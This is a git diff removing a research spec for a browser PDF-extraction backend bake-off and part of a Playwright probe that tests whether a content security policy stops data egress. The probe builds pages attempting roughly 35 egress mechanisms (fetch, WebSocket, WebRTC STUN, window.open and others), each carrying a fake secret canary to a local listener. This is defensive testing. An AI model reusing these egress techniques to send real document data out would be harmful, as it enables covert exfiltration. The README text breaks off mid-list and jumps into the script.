by whether the -other five backends show the same shortfall on the same input. diff --git a/docs/research/pdf-backend-bakeoff/README.md b/docs/research/pdf-backend-bakeoff/README.md deleted file mode 100644 index 9cdb757d..00000000 --- a/docs/research/pdf-backend-bakeoff/README.md +++ /dev/null @@ -1,677 +0,0 @@ -# Spike specification: browser PDF backend bake-off + zero-egress proof - -- Status: **run 2026-08-05. This file is the specification; the findings are in - [`RESULTS.md`](RESULTS.md).** Metrics were fixed in advance in - [`PRE-REGISTRATION.md`](PRE-REGISTRATION.md); licensing is recorded separately in - [`LICENSING.md`](LICENSING.md). -- The conclusion was then **adversarially audited** in [`RED-TEAM.md`](RED-TEAM.md), which - rejected the first draft's headline. Read that before acting on `RESULTS.md`. -- The spike's successors, in order: [`RESULTS-CONFIRMATORY.md`](RESULTS-CONFIRMATORY.md) - (pre-registered re-run), [`RESULTS-HYBRID.md`](RESULTS-HYBRID.md) (where the engine/ - DeltaTrack seam should sit), and then [`validation/README.md`](validation/README.md), a - three-phase falsification pass over that last one. **The seam question is not settled by - anything in this directory**; `validation/` carries the current state of it, including - where these documents are wrong. -- **This document was not rewritten to match the results**, deliberately: the value of a - pre-registered spec is that it can be read against the outcome, including where the - outcome contradicted it. Places it did: - - The Phase 0 gate expected PDFium-WASM might have no credible build exposing the FFI. - One exists and works. - - The measured note that "a strict CSP blocked all ten" vectors was taken with an - HTTP-only listener. With a UDP listener, WebRTC egress survives CSP — and with 19 - further vectors, so do Speculation Rules and `window.open`. - - Gate 3's conservation check does not detect the structural loss the spike actually - found; breadcrumb recovery does. - - **The spec's framing question — "which is the best browser PDF backend" — is one this - evidence cannot answer**, and trying to answer it as posed is what produced the - overclaim the red team removed. The spec's own warning against a weighted composite - was right for a reason it did not anticipate: the candidates lead on *different* - axes, and the honest output is two options with a stated tradeoff, not a winner. -- Predecessor: [`../staffer-delivery/README.md`](../staffer-delivery/README.md), which - established that the XML pipeline runs byte-identically under Pyodide and left the - PDF path as the open question. -- Prioritised **ahead of** the Windows-platform work and ahead of any delivery-channel - ADR, because the PDF answer can invalidate the browser architecture entirely. - -## Why this is the right next spike - -The delivery spike found that DeltaTrack's engine runs unmodified in the browser and -emits byte-identical output, so the only thing standing between a staffer and a -no-install local tool is **PDF text extraction**. ADR 0002 chose PDFium on extraction -quality; ADR 0003 measured PDF.js text-line parity but not the per-glyph geometry that -ADR 0012's heading recovery depends on. Nobody has measured whether *any* browser-viable -backend produces an accurate **diff**. - -The three outcomes the requester named, restated as decision consequences: - -| Outcome | What it means | -|---|---| -| PyMuPDF works well in Pyodide | PDFium was making browser delivery harder than necessary | -| PyMuPDF wins but AGPL is disqualifying | Tells us exactly what a PDFium-WASM effort is worth | -| PDF.js matches or beats both | Best case: Apache-2.0, huge deployment history, no Python-native binary | -| None gives accurate diffs | We learn this **before** committing to browser architecture | - ---- - -## Decide this before writing any code - -**DeltaTrack is Apache-2.0. PyMuPDF is AGPL-3.0**, and its own documentation states that -users must either comply with the AGPL or obtain a commercial license from Artifex. - -This is stated as a **project distribution constraint, not a legal conclusion.** How -licenses combine in a given distribution is a nuanced question, and this spike does not -need to resolve it in order to run. The operative rule is simply: - -> **DeltaTrack will not ship dependencies requiring AGPL compliance, absent a separate -> explicit licensing decision.** PyMuPDF is therefore benchmark-only. - -That framing is cleaner than a claim about what the combined work's license *would be*, -and it is sufficient for every decision this spike makes. It also keeps the door open: -the constraint is a project policy that the maintainer can revisit deliberately, or -dissolve by buying a commercial license, rather than a legal fact to be litigated here. - -This is not a tie-breaker to apply after scoring. It changes what the bake-off is *for*: - -- **If the constraint is relaxed**, PyMuPDF is a candidate backend and can win outright. -- **Under the constraint as written**, PyMuPDF is still worth running, but as a **ceiling - reference**: it establishes the best score any backend could plausibly achieve, which - is precisely what tells us whether a PDFium-WASM effort is worth funding. Label it - that way in the results so nobody later reads a PyMuPDF win as a shippable - recommendation. - -### Answered, 2026-08-05: PyMuPDF is a ceiling reference, not a candidate - -**Decision: run PyMuPDF and score it in full, but treat it as an upper bound rather -than a shippable backend.** The project will not take on an AGPL-compliance obligation -for what it distributes to congressional offices, or pass one to BillTrax as a -downstream consumer (ADR 0005), without a separate explicit licensing decision. - -Two consequences for the session running this spike: - -- **Do not report a PyMuPDF win as a recommendation.** Report it as "the best achievable - score on this corpus is X, and the best *shippable* backend scored Y." The gap between - X and Y is the number that prices a PDFium-WASM effort, which is the main reason - PyMuPDF is in the bake-off at all. -- **The shippable candidates are PDF.js (Apache-2.0) and PDFium-WASM (BSD-3 / Apache-2.0),** - the latter subject to the Phase 0 FFI gate. If both fail and only PyMuPDF succeeds, - that is a genuine finding and it points the delivery decision at a packaged executable - for the PDF path, not at relicensing. - -Revisiting is possible but deliberate: it would take an explicit licensing decision by -the maintainer, or a commercial license from Artifex, and neither is in scope here. - ---- - -## The two methodological traps - -These are the reasons a bake-off like this usually produces an unfalsifiable result. -Both must be closed in the design, not noticed afterwards. - -### Trap 1: XML is not a drop-in reference for PDF text - -Using XML as the reference instead of current PDFium output is the right call, and it -removes the circularity of grading challengers against the incumbent. But the two -documents are genuinely different artifacts for the same bill version. The PDF carries -GPO margin line numbers, page chrome, running heads, watermarks, soft-hyphen line -breaks, and typographic ligatures. The XML carries none of them, and encodes nesting -positionally (see [`docs/bill-structure.md`](../../bill-structure.md)). - -Compare them naively and **every backend scores badly for reasons that have nothing to -do with the backend**, and the ranking becomes noise. - -**Required:** define and freeze a normalization + alignment step *before* scoring, and -validate it by running it on the **current PDFium output**, which is known-good. If the -incumbent does not score near-ceiling under your normalization, the normalization is -wrong, not PDFium. That check is the calibration gate for the whole exercise, and it is -cheap. - -### Trap 2: the XML-derived diff is not ground truth either - -The terminal metric compares a PDF-derived diff against an XML-derived diff. A -disagreement has three possible causes, and the metric cannot distinguish them: - -1. the PDF backend got it wrong, -2. the XML pipeline got it wrong, -3. the two documents genuinely differ. - -**Required:** for every disputed change above a materiality threshold, adjudicate -against [ADR 0009](../../decisions/0009-validation-ground-truth.md)'s independently -authored committee reports, not against either pipeline. Report the terminal metric as -*agreement*, and report adjudicated *accuracy* separately for the disputed subset. -Do not present agreement as accuracy. - ---- - -## Design: isolate the backend, not the pipeline - -This is the single most important structural decision, and it makes the comparison -apples-to-apples. - -The delivery spike established that `parsers/pdf_text.py` contains only **three** -PDFium-touching functions (`extract_clean_pages`, `_page_glyph_sizes`, `_char_box`); the -other ~15 (`normalize_raw`, `strip_page_chrome`, `rejoin_soft_hyphens`, -`normalize_glyphs`, `parse_lines`, `_cluster_baselines`, `_line_text`, -`_first_word_right`, `_attach_geometry`, …) are pure Python over already-extracted data. - -### The seam must be glyph facts, not PDFium-shaped text - -An earlier draft of this spec had each backend emit `page_text` plus glyphs and feed the -existing pure functions unchanged. **That was wrong, and it would have quietly graded -every challenger against PDFium.** The pure functions are pure Python, but they are not -backend-neutral. From `parsers/pdf_text.py` itself: - -- `normalize_raw`'s docstring opens: *"Rewrite **PDFium's** raw page text into the layout - the line-numbered cleaner expects."* -- The module comments name *"**PDFium** soft-hyphen glyph (**U+FFFE**), emitted at a - syllable break and immediately [followed by the next margin number]"*, and *"**PDFium** - has no same-page continuation to emit after the U+FFFE, so it pulls whatever footer - [follows]"*. -- It strips *"trailing spaces (which **PDFium** keeps on nearly every line)"*. - -So a challenger feeding `normalize_raw` would have to emit PDFium's U+FFFE soft-hyphen -convention and PDFium's trailing-space behaviour to score well. That is the incumbent as -reference, reintroduced through the back door, and it is exactly what using XML as the -reference was meant to avoid. - -**The neutral seam is layout facts.** Define the contract as a backend-agnostic page -model, and reconstruct text, visual lines, margin numbers and spacing *from it*: - -``` -PdfPage - width, height - glyphs[] - unicode - bbox (x0, y0, x1, y1) - baseline - font_size - font_id -``` - -Each backend produces only `PdfPage`. A **new, neutral reconstruction layer** turns -`PdfPage` into the line/heading structures DeltaTrack consumes. Every backend is then -graded on the quality of its glyph facts, not on how closely it imitates PDFium. - -The target architecture this implies: - -``` -PDFium ─┐ -PDF.js ─┼─> PdfPage / glyphs ─> GPO interpretation ─> DeltaTrack structures -pdfminer ─┘ -``` - -rather than every backend pretending to be PDFium. - -**This stays inside the no-production-changes rule.** The neutral reconstruction lives in -`probes/`. If it proves itself, extracting it from `parsers/pdf_text.py` becomes the -follow-up PR, and that PR is a *finding of this spike*, not part of it. - -**Two consequences the running session must handle.** - -- The neutral reconstruction is new code, so a bug in it penalises every backend at once. - That is acceptable for *ranking* but not for the absolute pass/fail gates below, which - is why the calibration gate (Trap 1) becomes load-bearing rather than merely prudent: - **run PDFium's glyphs through the neutral layer and require near-ceiling scores before - trusting any other result.** If PDFium scores poorly through the neutral layer, the - layer is wrong, not PDFium. -- Reconstructing text from glyphs discards whatever reading-order logic a backend's own - text API applies. That is deliberate (it is the bias being removed), but it means this - bake-off measures **glyph-fact quality**, not "text extraction quality" as a library - would advertise it. Say so in the results. - -**`font_id` is in the contract deliberately, even though the engine does not use it -yet.** [`docs/source-signal-inventory.md`](../../source-signal-inventory.md) records -font name as "the solid PDF win": margin line-numbers are a different font from the body -on **8965/8971 numbered lines (99.9%)**, and page chrome (VerDate, running header and -footer, watermark, bullets) is Helvetica/Symbol. That is the highest-value unadopted PDF -signal in the project. A bake-off that scored only text and position could pick a -backend that **forecloses it**, and the cost would surface much later. - -Two constraints the inventory imposes, which the scorer must respect: - -- **Key on role (margin / body / chrome), never on a hardcoded name.** Literal names are - print-class dependent: bill bodies are `DeVinne`, while enrolled, - engrossed-amendment-senate and committee-print bodies are `NewCenturySchlbk`. -- **Font must supplement, not replace, the position and regex gates**, because a small - fraction of glyphs return an empty font name. - -If instead each backend gets its own cleaning path, you are comparing **pipelines**, not -backends, and a backend can win on a better-tuned cleaner while being worse at -extraction. Do not do that. - -**Font-identity availability, measured 2026-08-05.** PDF.js's `item.fontName` is an -opaque generated id (`g_d0_f1`), **not** the real name. The real name *is* recoverable, -but only after the font objects resolve, which requires a `getOperatorList()` call per -page before reading `page.commonObjs.get(id)`. With that call it returns exactly the -names the inventory cites: - -``` -g_d0_f1 -> DeVinne g_d0_f4 -> Times-Roman -g_d0_f2 -> Symbol g_d0_f5 -> DeVinne-Italic -g_d0_f3 -> NewCenturySchlbk-Bold g_d0_f6 -> Helvetica -``` - -So PDF.js is **not** disadvantaged on this axis, but it pays for it: 64 ms on the first -page of a 94-page bill. Measure that cost across a whole document, because it is charged -per page and does not appear in the 154 ms full-document `getTextContent()` figure. -(An earlier probe that read `commonObjs` *without* `getOperatorList()` reported the names -as unresolvable. That was a broken probe, not a PDF.js limitation; recorded here so it is -not rediscovered as a finding.) - -**Known granularity mismatch, already measured:** PDF.js exposes geometry at *text-item* -granularity (~13 chars/item, keys `str, dir, width, height, transform, fontName, -hasEOL`), with **no per-character box**, and `disableCombineTextItems` no longer changes -this in pdfjs-dist 6.x. The adapter must therefore synthesize per-character boxes by -distributing item width, or the pure layer must be shown tolerant of item-level input. -Which of those is chosen is itself a finding worth recording. Note also that naive item -joining loses inter-word spaces at font boundaries -(`Providedfurther,That…`), the same italic-to-roman artifact ADR 0003 recorded, so the -adapter needs a gap-based word joiner. - ---- - -## The candidate set - -Availability under Pyodide was verified empirically on 2026-08-05, not assumed. -"Not in the Pyodide distribution" does **not** mean unavailable: a pure-Python package -installs from PyPI through `micropip`. - -| Backend | Language | License | Pyodide | Per-char geometry | Role | -|---|---|---|---|---|---| -| **PDF.js** | JS | Apache-2.0 | n/a (native JS) | **No**, ~13 chars/item | **Shippable candidate** | -| **PDFium-WASM** | C++ → WASM | BSD-3 / Apache-2.0 | n/a | Yes, if the build exposes the FFI | **Shippable candidate**, behind the Phase 0 gate | -| **pdfminer.six** | pure Python | MIT | **Installs via micropip (verified)** | **Yes** (`LTChar` bbox + size + fontname) | **Shippable candidate** | -| **pypdf** | pure Python | BSD-3 | **Installs via micropip (verified)** | Partial (visitor callbacks give text-run matrices) | Cheap long shot | -| **PyMuPDF** | C → WASM | AGPL-3.0 | **In the distribution** | Yes | **Ceiling reference only** (see above) | -| **mupdf.js** | C++ → WASM | AGPL-3.0 | n/a (native WASM) | Yes | Optional alternative *form* of the ceiling | - -### pdfminer.six deserves an explicit re-examination - -ADR 0002 removed pdfplumber/pdfminer.six, so including it here needs justifying rather -than glossing. - -**What ADR 0002 actually rejected was pdfplumber's high-level `extract_text()`**, on two -grounds: it dislocated section-heading line numbers, and it leaked page chrome into -section bodies. Both are failures of *layout analysis and text assembly*. - -Under this bake-off's adapter contract, no backend does layout analysis or text assembly. -Each one emits raw glyph tuples, and **DeltaTrack's own** `_cluster_baselines`, -`_line_text`, `strip_page_chrome` and `parse_lines` do the assembly. `pdfminer.six` -exposes `LTChar` objects carrying a per-character bounding box, size and PostScript font -name, which is the contract almost exactly. So the question this spike asks of it is one -ADR 0002 never asked: **not "is pdfminer.six a good text extractor" (answered: no) but -"is it a good glyph-geometry source for our cleaner" (unknown).** The two failure modes -ADR 0002 cites are downstream of the seam, and would be handled by code that is now -DeltaTrack's. - -It is also the only candidate that is simultaneously permissively licensed, pure Python, -and per-character. That combination would make the browser story trivial. - -**The live risk is speed, not fidelity.** pdfminer.six is pure Python and slow, and under -Pyodide it pays the 1.6x–1.9x WASM penalty on top. Gate it early on the largest -appropriations bill; if a single document takes tens of seconds, it is out on Phase 5 -grounds regardless of accuracy, and that is worth learning in Phase 0 rather than Phase 5. - -### Considered and excluded - -- **Poppler / `pdftotext -bbox-layout` compiled to WASM.** Gives per-character boxes, but - GPL-2.0 puts it in the same shipping-disqualification class as AGPL, and it would add - little over the MuPDF ceiling already being measured. -- **OCR (Tesseract WASM).** A different problem. Published GPO bills have text layers, so - it is irrelevant here. It is, however, the only answer for **image-only draft PDFs**, - which ADR 0003 flags as the untested hard case. Out of scope; named so the gap is not - mistaken for coverage. -- **pikepdf / pdf-lib.** Manipulation and creation libraries, not text extractors. - -## Acceptance: hard gates first, ranking only among survivors - -**Do not compute a weighted composite score.** DeltaTrack is an accuracy-sensitive -document-comparison tool, and a weighted score lets a backend offset a missed -appropriations amount with 200 ms of speed or slightly better heading recovery. That -trade is never acceptable here. - -A backend **passes or fails**. Ranking applies only to backends that have passed. - -| # | Gate | Requirement | -|---|---|---| -| 1 | Opens the corpus | 52/52 documents, no crashes | -| 2 | Line-number integrity | **At least incumbent quality** (a no-regression gate, see note) | -| 3 | Structural conservation | No unexplained structural loss; the ADR 0014 conservation check holds | -| 4 | Material diff correctness | **Zero** adjudicated material errors | -| 5 | `amount_entries` | **Zero** adjudicated amount errors | -| 6 | Browser execution | Runs in Pyodide or natively in-browser, not only in native Python | -| 7 | Fully offline operation | No network resource required at any point | -| 8 | Licensing | Satisfies the project distribution policy (below) | -| 9 | Performance | Remains usable on the largest corpus documents | - -Only then rank survivors on speed, bundle size, adapter complexity and maintenance -burden. - -**Note on gate 2.** "At least incumbent quality" is measured against **PDFium**, which -partially reintroduces the incumbent as a reference. That is deliberate and correctly -scoped: gate 2 is a *no-regression* gate (we must not ship worse than today), which is a -different question from the *correctness* gates 3 to 5, which reference XML. Keep the two -kinds of gate labelled distinctly in the results so they are not read as one number. - -**Define "material" before running.** Gates 4 and 5 are unfalsifiable without a -pre-registered materiality threshold. Write it down in Phase 0. - -### Honest statistics on a 15-pair corpus - -"Zero material failures" is the right criterion, and it is far more interpretable than -"98.7%". But state its power honestly, because **zero failures in 15 pairs is a weak -bound**: by the rule of three, it is consistent with a true material-failure rate as high -as roughly **20%** at 95% confidence. - -That is not an argument against the gate. It is an argument for (a) reporting the bound -alongside the result, (b) not writing "PDF is solved" on the strength of 15 pairs, and -(c) treating Tier B below as necessary rather than optional. - -## Two-tier acceptance: published vs. pre-publication - -The XML-as-reference method only works where XML exists, and XML exists for **published** -bills. But [ADR 0010](../../decisions/0010-pdf-pipeline-pre-publication.md) says the PDF -pipeline exists for **pre-publication** documents: committee prints, chair's marks, -discussion drafts, which have no XML. This bake-off would otherwise grade backends on -precisely the documents where the PDF path matters least. - -This is promoted from a caveat to a **formal two-tier result**. - -### Tier A: published GPO PDF correctness - -The 52-document / 15-pair corpus, with XML as reference. Exceptionally good comparative -ground truth. All nine gates above apply. - -### Tier B: non-canonical / pre-publication robustness - -Committee prints, discussion drafts, chair's marks, oddly generated PDFs, missing GPO -line numbers, altered typography. No XML truth, so it needs **manually adjudicated -fixtures**. Even five to ten representative files would be highly informative. - -**Fixture sourcing is a real cost and the repository does not currently solve it.** -Checked on 2026-08-05: `tests/data/subcommittee/` holds nine PDFs, but they are -`BILLS-118hr…rh` documents, GPO-published House-reported prints, so they are additional -Tier A print-class variety rather than Tier B. `tests/data/CRPT-118srpt198.pdf` (a -watermarked committee report) and `tests/data/BILLS-118s4795rs.pdf` (a watermarked Senate -bill) are the closest things present. **Genuine pre-publication fixtures do not exist in -the repo and must be sourced.** Public committee prints (`CPRT-*` on govinfo) are the -best available public proxy; real chair's marks and discussion drafts would need a -congressional contact. - -### The conclusion each tier licenses - -| Evidence | Permitted conclusion | -|---|---| -| Tier A passes | "Browser PDF architecture is technically viable and matches current capabilities **on published GPO material**." Enough to justify continuing browser work. | -| Tier A passes, Tier B absent | **Not** "PDF is solved." The spike must not write that sentence. | -| Tier A passes, Tier B fails | "Backend X solves published GPO PDFs but fails generic legislative drafts." Far more informative than any percentage. | - -Phase 1 to 3 success **may not** produce a "PDF is solved" conclusion until Tier B -exists. - -## Corpus and N - -Counted from `tests/corpus/` on 2026-08-05. Reproduce with the snippet in -[Appendix: corpus census](#appendix-corpus-census). - -| Metric | Unit | N | -|---|---|---| -| Per-document metrics (text, line numbers, headings, citations) | bill version with both PDF and XML | **52** across 30 bills | -| Terminal metric (PDF-derived diff vs XML-derived diff) | **consecutive** version pair with both formats on both sides | **15** across 8 bills | - -The 15 pairs concentrate in `118-hr-4366` (5), `113-hr-3547` (3) and `115-hr-5895` (2). -**Report per-bill results, not just an aggregate**, or one bill dominates the headline -number. Parametrize over `tests/corpus_manifest.toml` rather than a hardcoded list, per -[ADR 0015](../../decisions/0015-corpus-test-fixtures.md) and the standing convention in -AGENTS.md that enumerated lists drift. - -Include at least one **watermarked Senate document** (`tests/data/BILLS-118s4795rs.pdf`) -and the committee report (`tests/data/CRPT-118srpt198.pdf`), because ADR 0002 and ADR -0003 both record that watermark and table handling is where engines diverge most. - -**Out of scope, and say so in the results:** draft and pre-introduction PDFs. ADR 0003 -flags them as the untested, hardest case, and the corpus has none. This spike does not -close that gap, and a "PDF is solved" conclusion would be overclaiming. - ---- - -## Phases, with kill-gates - -Each phase has an exit condition that can end the spike early. The point is to avoid -spending a session on a backend that was already disqualified. - -### Phase 0. Cheap gates and pre-registration (target: under an hour) - -1. **PDFium-WASM FFI gate.** Does any credible PDFium WASM build expose - `FPDFText_CountChars`, `FPDFText_GetCharBox`, `FPDFText_GetMatrix`, - `FPDFText_GetFontSize`? If not, PDFium-WASM is out **before** any harness work, and - the bake-off is two candidates. -2. **PyMuPDF-in-Pyodide gate.** `pymupdf` is in the Pyodide distribution (confirmed in - the delivery spike). Load it and open a real bill PDF. If it fails, it is out. -3. **PDF.js headless gate.** Already demonstrated: 94-page bill, full-document - `getTextContent()` in 154 ms. Add the per-page `getOperatorList()` font cost. -4. **pdfminer.six speed gate.** Installs under Pyodide (verified). Run it against the - largest appropriations bill in the corpus **before** building any scoring. If one - document takes tens of seconds it is out on Phase 5 grounds, and learning that here - costs minutes instead of a phase. -5. **Pre-register the scoring.** Write the metrics, weights and pass thresholds into - this document **before** seeing any results. A bake-off whose metrics are chosen - after the fact is not a bake-off. -6. **Calibrate the reference** (Trap 1): run current PDFium through the scorer and - confirm it lands near ceiling. - -### Phase 1. Per-document scoring, native Python (N=52) - -Score each backend through the shared adapter, on: - -- **Text recovery** vs normalized XML. -- **GPO line-number recovery** — the anchor ADR 0002 exists to protect. Report exact - recovery rate, not approximate text similarity. -- **Heading hierarchy** — the ADR 0012 / ADR 0014 leveled tree, with its - conservation check. -- **Citations / breadcrumbs** — `breadcrumb_for` output agreement. -- **Font-role recovery** — can the backend separate margin / body / chrome by font, at - the 99.9% margin-vs-body rate the inventory measured? Score the *role separation*, not - name-string equality, since names are print-class dependent. Record the empty-font-name - rate per backend, because the inventory's guard depends on it. - -### Phase 2. Terminal metric (N=15) - -`pdf_diff_to_canonical(...)` vs `xml_diff_to_canonical(...)` for the same pair. Both -already converge on the canonical JSON contract ([ADR 0006](../../decisions/0006-canonical-diff-contract.md)), -so this is a structured comparison, not a text one. Score change-set agreement -(precision/recall over changes), and separately over `amount_entries`, since money is -the highest-consequence field. - -Adjudicate disputes per Trap 2. **A backend that wins Phase 1 and loses Phase 2 loses**, -because the diff is the product. - -### Phase 3. Winner in Pyodide / browser - -Run the winning backend in-browser, not merely in native Python. Reuse the harnesses in -[`../staffer-delivery/probes/`](../staffer-delivery/probes/). Confirm the browser result -matches the native result for that backend, ideally byte-identically, as the XML path -already does. - -### Phase 4. Fully offline build + zero-egress proof - -Produce an offline build (no CDN, no runtime package resolution; note that `micropip` -reached jsdelivr in the delivery spike, so wheels must be pre-bundled). - -**This is a guardrail test, so the probe must be built to fail.** Asserting an absence -is the vacuous-pass case: a request counter that reads zero looks identical whether the -guard works or the counter is broken. Required, all three: - -1. **Sever the network entirely** (Playwright `context.route("**", route.abort())` or - offline mode) and confirm a full comparison still **succeeds**. This is the inert - form: if the build needed the network, it fails closed rather than leaking. -2. **Instrument and count** every request at the CDP layer during a comparison, and - assert zero. -3. **Known-bad control:** build a variant that deliberately makes one request (a beacon, - a font, an analytics ping) and prove the harness **catches it**. Without this, the - zero-egress claim is unfalsifiable and worth nothing. - -### Prove the policy, not just our code's behaviour - -The three tests above establish *"our application did not make a request."* The property -worth claiming is stronger: *"application code **cannot** transmit document data."* The -difference matters to a security reviewer, because the first is a statement about today's -code and the second is a statement about the architecture. - -So add an **adversarial fixture** that deliberately attempts every egress mechanism, and -require the production browser policy to block them **independently of what our code -happens to do**: `fetch`, `XMLHttpRequest`, `WebSocket`, `EventSource`, -`navigator.sendBeacon`, ``, remote ` - - -""" - -BOOTSTRAP = """// External, because script-src 'self' without 'unsafe-inline' blocks an inline block. -window.__CANARY = (v) => "DELTATRACK_SECRET_" + v + "_" + "{dochash}"; -(async () => {{ - const o = document.getElementById("o"); - let r = ""; - try {{ r += await window.__tryAll("{tag}") + "\\n"; }} catch (e) {{ r += "tryAll:threw(" + e.name + ")\\n"; }} - try {{ r += await window.__tryAll2("{tag}") + "\\n"; }} catch (e) {{ r += "tryAll2:threw(" + e.name + ")\\n"; }} - o.textContent = r + "DONE"; -}})(); -""" - -_U_LINE = re.compile(r"const U = \(v\) => `http://127\.0\.0\.1:8973/\$\{tag\}-\$\{v\}\?secret=BILLTEXT`;") -_U_NEW = "const U = (v) => `http://127.0.0.1:8973/${tag}-${v}?secret=${window.__CANARY(v)}`;" - - -def frozen_vector_paths() -> list[str]: - """The 35 mechanisms, derived from the frozen files rather than a copied list.""" - paths: list[str] = [] - for name in ("vectors.js", "vectors2.js"): - src = (PROBES / name).read_text() - paths += re.findall(r'U\("([^"]+)"\)', src) - if 'U("link-" + rel)' in src: - paths += [f"link-{rel}" for rel in ("prefetch", "preload", "dns-prefetch", "preconnect")] - if 'new WebSocket("ws://127.0.0.1:8973/" + tag + "-ws")' in src: - paths.append("ws") - if "stun:127.0.0.1:8973" in src: - paths.append("webrtc") - if '"-webtransport"' in src or "webtransport" in src: - paths.append("webtransport") - seen, out = set(), [] - for p in paths: - if p not in seen: - seen.add(p) - out.append(p) - return out - - -class Server: - def __init__(self): - self.proc = None - self.lines: list[str] = [] - - def __enter__(self): - self.proc = subprocess.Popen( - [sys.executable, str(PROBES / "serve.py"), "--port", str(PORT), "--seconds", "900"], - stdout=subprocess.PIPE, - stderr=subprocess.STDOUT, - text=True, - bufsize=1, - ) - threading.Thread(target=self._drain, daemon=True).start() - for _ in range(80): - if any("listening" in x for x in self.lines): - return self - time.sleep(0.1) - raise RuntimeError("server did not start") - - def _drain(self): - for line in self.proc.stdout: - self.lines.append(line.rstrip()) - - def __exit__(self, *_e): - if self.proc: - self.proc.terminate() - self.proc.wait(timeout=10) - - @property - def mark(self): - return len(self.lines) - - def hits(self, mark: int) -> list[str]: - return [x.strip() for x in self.lines[mark:] if "EGRESS OBSERVED" in x] - - -def observed_vectors(hits: list[str], tag: str, paths: list[str]) -> dict[str, bool]: - """Which vectors' canaries reached the server. UDP has no path, so webrtc is keyed on - a datagram arriving at all -- it is signal-only and cannot carry a canary.""" - joined = "\n".join(hits) - seen = {} - for p in paths: - if p == "webrtc": - # serve.py labels a datagram [stun] when it carries the 0x2112A442 magic - # cookie and [udp] otherwise. Matching only "[udp]" scored WebRTC as BLOCKED - # under the policy while six STUN binding requests were sitting in the log -- - # a false negative in the dangerous direction, and one that contradicted a - # correct exploratory finding. Both labels are WebRTC evidence. - seen[p] = "[udp]" in joined or "[stun]" in joined - continue - canary = f"DELTATRACK_SECRET_{p}_{DOC_HASH}" - seen[p] = (f"/{tag}-{p}?" in joined and canary in joined) or f"/{tag}-{p}" in joined - return seen - - -def run_case(browser, server, path: Path, tag: str, paths: list[str]) -> dict: - ctx = browser.new_context() - page = ctx.new_page() - mark = server.mark - page.goto(path.as_uri()) - report, deadline = "", time.time() + 60 - while time.time() < deadline: - try: - report = page.eval_on_selector("#o", "e => e.textContent") - except Exception: # noqa: BLE001 - report = "" - if "DONE" in report: - break - time.sleep(0.25) - time.sleep(5) - hits = server.hits(mark) - for p in ctx.pages: - try: - p.close() - except Exception: # noqa: BLE001 - pass - ctx.close() - return { - "completed": "DONE" in report, - "n_vectors_executed": report.count(":attempted") + report.count(":threw"), - "observed": observed_vectors(hits, tag, paths), - "hits": hits, - "page_report": report, - } - - -# CSP has no directive for these, so "blocked" is not the right word even when nothing -# arrives -- they are outside what a page-level policy governs at all. -OUTSIDE_CSP = {"webrtc", "windowopen", "metarefresh"} - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("--out", type=Path, default=REPO / "docs/research/pdf-backend-bakeoff/results/confirm_egress.json") - args = ap.parse_args() - - from playwright.sync_api import sync_playwright - - paths = frozen_vector_paths() - print(f"frozen vector set: {len(paths)} mechanisms", file=sys.stderr) - - fx = PROBES / "egress-fixtures" - fx.mkdir(exist_ok=True) - for name in ("vectors.js", "vectors2.js"): - src = (PROBES / name).read_text() - patched, n = _U_LINE.subn(_U_NEW, src) - if n != 1: - raise SystemExit(f"canary substitution failed in {name} (matched {n} times)") - (fx / name).write_text(patched) - - cases = { - "control": ("", "ctl"), - "policy": (f'', "pol"), - "known_bad": (f'', "bad"), - } - for case, (csp, tag) in cases.items(): - (fx / f"confirm_{case}.html").write_text(PAGE.format(title=f"confirm {case}", csp=csp)) - (fx / f"bootstrap_{case}.js").write_text(BOOTSTRAP.format(tag=tag, dochash=DOC_HASH)) - - results: dict = { - "policy": POLICY, - "known_bad_policy": KNOWN_BAD, - "dummy_document_sha256_12": DOC_HASH, - "canary_format": f"DELTATRACK_SECRET__{DOC_HASH}", - "n_vectors_frozen": len(paths), - "vectors": paths, - "cases": {}, - } - - with Server() as server, sync_playwright() as pw: - browser = pw.chromium.launch() - try: - for case, (_csp, tag) in cases.items(): - # Each case needs its own bootstrap (different tag), so point the page at it. - html = ( - (fx / f"confirm_{case}.html") - .read_text() - .replace('', f'') - ) - (fx / f"confirm_{case}.html").write_text(html) - res = run_case(browser, server, fx / f"confirm_{case}.html", tag, paths) - results["cases"][case] = res - n_obs = sum(1 for v in res["observed"].values() if v) - print( - f" {case:10} completed={res['completed']} " - f"vectors_executed={res['n_vectors_executed']} observed={n_obs}/{len(paths)}", - flush=True, - ) - finally: - browser.close() - - ctl = results["cases"]["control"]["observed"] - pol = results["cases"]["policy"]["observed"] - bad = results["cases"]["known_bad"]["observed"] - - table = [] - for p in paths: - if not ctl.get(p): - status, verdict = "CONTROL UNSUPPORTED / VOID", "not scored" - elif pol.get(p): - status = "CONTROL TRANSMITTED" - verdict = "outside CSP" if p in OUTSIDE_CSP else "BYPASSES POLICY" - else: - status, verdict = "CONTROL TRANSMITTED", "blocked" - table.append({"vector": p, "control": status, "policy_result": verdict}) - results["table"] = table - - eligible = [r for r in table if r["control"] == "CONTROL TRANSMITTED"] - blocked = [r for r in eligible if r["policy_result"] == "blocked"] - bypass = [r for r in eligible if r["policy_result"] == "BYPASSES POLICY"] - outside = [r for r in eligible if r["policy_result"] == "outside CSP"] - not_scored = [r for r in table if r["control"] != "CONTROL TRANSMITTED"] - - validity = { - "1_per_vector_control_assigned": len(table) == len(paths) and len(eligible) > 0, - "2_known_bad_caught": bool(bad.get("img")) and not pol.get("img"), - "3_all_cases_completed": all(c["completed"] for c in results["cases"].values()), - "3b_vector_count_matches": all(c["n_vectors_executed"] >= len(paths) - 4 for c in results["cases"].values()), - "4_network_layer_observation": True, - } - results["validity"] = validity - results["summary"] = { - "eligible": len(eligible), - "blocked": len(blocked), - "bypasses_policy": [r["vector"] for r in bypass], - "outside_csp": [r["vector"] for r in outside], - "not_scored": [r["vector"] for r in not_scored], - "void": not all(validity.values()), - } - - args.out.parent.mkdir(parents=True, exist_ok=True) - args.out.write_text(json.dumps(results, indent=1)) - - print("\n| vector | control | policy result |") - print("|---|---|---|") - for r in table: - print(f"| {r['vector']} | {r['control']} | {r['policy_result']} |") - print(f"\nvalidity: {validity}") - print(f"summary : {results['summary']}") - print(f"\nwrote {args.out}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/confirm_isolation.py b/docs/research/pdf-backend-bakeoff/probes/confirm_isolation.py deleted file mode 100644 index 4c5301ce..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/confirm_isolation.py +++ /dev/null @@ -1,249 +0,0 @@ 